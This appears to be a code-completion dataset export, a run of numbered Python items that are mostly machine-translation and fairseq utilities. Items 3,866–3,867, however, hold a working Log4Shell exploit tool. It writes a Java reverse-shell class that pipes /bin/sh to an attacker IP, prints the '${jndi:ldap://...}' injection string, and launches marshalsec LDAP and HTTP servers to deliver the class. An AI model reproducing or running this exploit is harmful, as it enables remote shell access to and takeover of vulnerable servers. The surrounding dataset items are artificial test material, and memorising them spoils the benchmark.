3,851 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
The provided code snippet includes necessary dependencies for implementing the `get_masks` function. Write a Python function `def get_masks(slen, lengths, causal, k=None)` to solve the following problem:
Generate hidden states mask, and optionally an attention mask.
Here is the function:
def get_masks(slen, lengths, causal, k=None):
"""
Generate hidden states mask, and optionally an attention mask.
"""
assert lengths.max().item() <= slen
bs = lengths.size(0)
alen = torch.arange(slen, dtype=torch.long, device=lengths.device)
mask = alen < lengths[:, None]
# attention mask is the same as mask, or triangular inferior attention (causal)
if causal:
attn_mask = alen[None, None, :].repeat(bs, slen, 1) <= alen[None, :, None]
else:
attn_mask = mask
# sanity check
assert mask.size() == (bs, slen)
assert causal is False or attn_mask.size() == (bs, slen, slen)
return mask, attn_mask | Generate hidden states mask, and optionally an attention mask. |
3,852 | import os
import io
import sys
import argparse
import torch
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.fp16 import network_to_half
def bool_flag(s):
"""
Parse boolean arguments from the command line.
"""
if s.lower() in FALSY_STRINGS:
return False
elif s.lower() in TRUTHY_STRINGS:
return True
else:
raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
"""
Generate a parameters parser.
"""
# parse parameters
parser = argparse.ArgumentParser(description="Translate sentences")
# main parameters
parser.add_argument("--dump_path", type=str, default="./dumped/", help="Experiment dump path")
parser.add_argument("--exp_name", type=str, default="", help="Experiment name")
parser.add_argument("--exp_id", type=str, default="", help="Experiment ID")
parser.add_argument("--fp16", type=bool_flag, default=False, help="Run model with float16")
parser.add_argument("--batch_size", type=int, default=32, help="Number of sentences per batch")
# model / output paths
parser.add_argument("--model_path", type=str, default="", help="Model path")
parser.add_argument("--output_path", type=str, default="", help="Output path")
parser.add_argument("--beam", type=int, default=1, help="Beam size")
parser.add_argument("--length_penalty", type=float, default=1, help="length penalty")
# parser.add_argument("--max_vocab", type=int, default=-1, help="Maximum vocabulary size (-1 to disable)")
# parser.add_argument("--min_count", type=int, default=0, help="Minimum vocabulary count")
# source language / target language
parser.add_argument("--src_lang", type=str, default="", help="Source language")
parser.add_argument("--tgt_lang", type=str, default="", help="Target language")
return parser | Generate a parameters parser. |
3,853 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def get_parser():
parser = argparse.ArgumentParser(description="Remove noisy data")
parser.add_argument("--input", type=str,
help="The path of input file")
parser.add_argument("--lang", type=str,
help="The language of input file")
parser.add_argument("--output", type=str, default=None,
help="The path of output file")
return parser | null |
3,854 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def detect_exist_url(text):
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
url1 = re.findall('http[s]?//(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
return len(urls) > 0 or len(url1) > 0 | null |
3,855 | import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def detect_lang(text, lang):
try:
for i, l in enumerate(Detector(text, quiet=True).languages):
if l.code == lang and i == 0:
return True
if detect(text) == lang:
return True
return False
except:
return False | null |
3,856 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m | null |
3,857 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.)
return m | null |
3,858 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import options, utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
MultiheadAttention,
LayerNorm,
)
from fairseq.modules.transformer_sentence_encoder import init_bert_params
from .learned_positional_embedding import LearnedPositionalEmbedding
def transformer_middle(args):
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 1024)
args.encoder_ffn_embed_dim = getattr(args, 'encoder_ffn_embed_dim', 4096)
args.encoder_attention_heads = getattr(args, 'encoder_attention_heads', 16)
args.encoder_layers = getattr(args, 'encoder_layers', 6)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 1024)
args.decoder_ffn_embed_dim = getattr(args, 'decoder_ffn_embed_dim', 4096)
args.decoder_attention_heads = getattr(args, 'decoder_attention_heads', 16)
args.decoder_layers = getattr(args, 'decoder_layers', 6)
transformer_base(args)
def transformer_big(args):
args.encoder_layers = getattr(args, 'encoder_layers', 12)
args.decoder_layers = getattr(args, 'decoder_layers', 12)
transformer_middle(args) | null |
3,859 | from collections import OrderedDict
from fairseq import utils
from fairseq.models import FairseqMultiModel, register_model, register_model_architecture, BaseFairseqModel
from fairseq.models.transformer import (
base_architecture,
Embedding,
TransformerEncoder,
TransformerDecoder,
TransformerModel,
)
import torch.nn as nn
import torch.nn.functional as F
def base_x_transformer(args):
base_architecture(args) | null |
3,860 | from collections import OrderedDict
from fairseq import utils
from fairseq.models import FairseqMultiModel, register_model, register_model_architecture, BaseFairseqModel
from fairseq.models.transformer import (
base_architecture,
Embedding,
TransformerEncoder,
TransformerDecoder,
TransformerModel,
)
import torch.nn as nn
import torch.nn.functional as F
def build_embedding(dictionary, embed_dim, path=None):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
# if provided, load from preloaded dictionaries
if path:
embed_dict = utils.parse_embedding(path)
utils.load_embedding(embed_dict, dictionary, emb)
return emb | null |
3,861 | import numpy as np
import torch
from fairseq import utils
from fairseq.data import data_utils, FairseqDataset
def collate(
samples, pad_idx, eos_idx, left_pad_source=True, left_pad_target=False,
input_feeding=True
):
if len(samples) == 0:
return {}
def merge(key, left_pad, move_eos_to_beginning=False):
return data_utils.collate_tokens(
[s[key] for s in samples],
pad_idx, eos_idx, left_pad, move_eos_to_beginning,
)
id = torch.LongTensor([s['id'] for s in samples])
src_tokens = merge('source', left_pad=left_pad_source)
# sort by descending source length
src_lengths = torch.LongTensor([s['source'].numel() for s in samples])
src_lengths, sort_order = src_lengths.sort(descending=True)
id = id.index_select(0, sort_order)
src_tokens = src_tokens.index_select(0, sort_order)
prev_output_tokens = None
target = None
if samples[0].get('target', None) is not None:
target = merge('target', left_pad=left_pad_target)
target = target.index_select(0, sort_order)
ntokens = sum(len(s['target']) for s in samples)
if input_feeding:
# we create a shifted version of targets for feeding the
# previous output token(s) into the next decoder step
prev_output_tokens = merge(
'target',
left_pad=left_pad_target,
move_eos_to_beginning=True,
)
prev_output_tokens = prev_output_tokens.index_select(0, sort_order)
else:
ntokens = sum(len(s['source']) for s in samples)
batch = {
'id': id,
'nsentences': len(samples),
'ntokens': ntokens,
'net_input': {
'src_tokens': src_tokens,
'src_lengths': src_lengths,
},
'target': target,
}
if prev_output_tokens is not None:
batch['net_input']['prev_output_tokens'] = prev_output_tokens
return batch | null |
3,862 | import numpy as np
import torch
from fairseq import utils
from fairseq.data import data_utils, FairseqDataset
The provided code snippet includes necessary dependencies for implementing the `generate_dummy_batch` function. Write a Python function `def generate_dummy_batch(num_tokens, collate_fn, src_vocab, tgt_vocab, src_len=128, tgt_len=128)` to solve the following problem:
Return a dummy batch with a given number of tokens.
Here is the function:
def generate_dummy_batch(num_tokens, collate_fn, src_vocab, tgt_vocab, src_len=128, tgt_len=128):
"""Return a dummy batch with a given number of tokens."""
bsz = num_tokens // max(src_len, tgt_len)
return collate_fn([
{
'id': i,
'source': src_vocab.dummy_sentence(src_len),
'target': tgt_vocab.dummy_sentence(tgt_len),
'output': tgt_vocab.dummy_sentence(tgt_len),
}
for i in range(bsz)
]) | Return a dummy batch with a given number of tokens. |
3,863 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_mass_dataset_key(lang_pair):
return "mass:" + lang_pair | null |
3,864 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_mt_dataset_key(lang_pair):
return "" + lang_pair | null |
3,865 | from collections import OrderedDict
import os
import torch
from fairseq.data import (
IndexedCachedDataset,
IndexedDataset,
IndexedRawTextDataset,
LanguagePairDataset,
NoisingDataset,
RoundRobinZipDatasets,
MonolingualDataset,
TokenBlockDataset,
)
from fairseq.data.masked_lm_dictionary import MaskedLMDictionary
from fairseq import options, checkpoint_utils
from fairseq.models import FairseqMultiModel
from fairseq.sequence_generator import SequenceGenerator
from fairseq.tasks import register_task, FairseqTask
from fairseq.tasks.semisupervised_translation import parse_lambda_config
from .masked_language_pair_dataset import MaskedLanguagePairDataset
from .noisy_language_pair_dataset import NoisyLanguagePairDataset
def _get_memt_dataset_key(lang_pair):
return "memt:" + lang_pair | null |
3,866 | import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
def generate_payload(userip: str, lport: int) -> None:
program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
# writing the exploit to Exploit.java file
p = Path("Exploit.java")
try:
p.write_text(program)
subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
except OSError as e:
print(Fore.RED + f'[-] Something went wrong {e}')
raise e
else:
print(Fore.GREEN + '[+] Exploit java class created success')
def ldap_server(userip: str, lport: int) -> None:
sendme = "${jndi:ldap://%s:1389/a}" % (userip)
print(Fore.GREEN + f"[+] Send me: {sendme}\n")
url = "http://{}:{}/#Exploit".format(userip, lport)
subprocess.run([
os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
"-cp",
os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
"marshalsec.jndi.LDAPRefServer",
url,
])
def payload(userip: str, webport: int, lport: int) -> None:
generate_payload(userip, lport)
print(Fore.GREEN + '[+] Setting up LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=ldap_server, args=(userip, webport))
t1.start()
# start the web server
print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
httpd.serve_forever() | null |
3,867 | import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def check_java() -> bool:
exit_code = subprocess.call([
os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),
'-version',
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
return exit_code == 0 | null |
3,868 | from setuptools import find_packages, setup
import os
import subprocess
import sys
import time
import torch
from torch.utils.cpp_extension import (BuildExtension, CppExtension,
CUDAExtension)
def readme():
return ''
# with open('README.md', encoding='utf-8') as f:
# content = f.read()
# return content | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.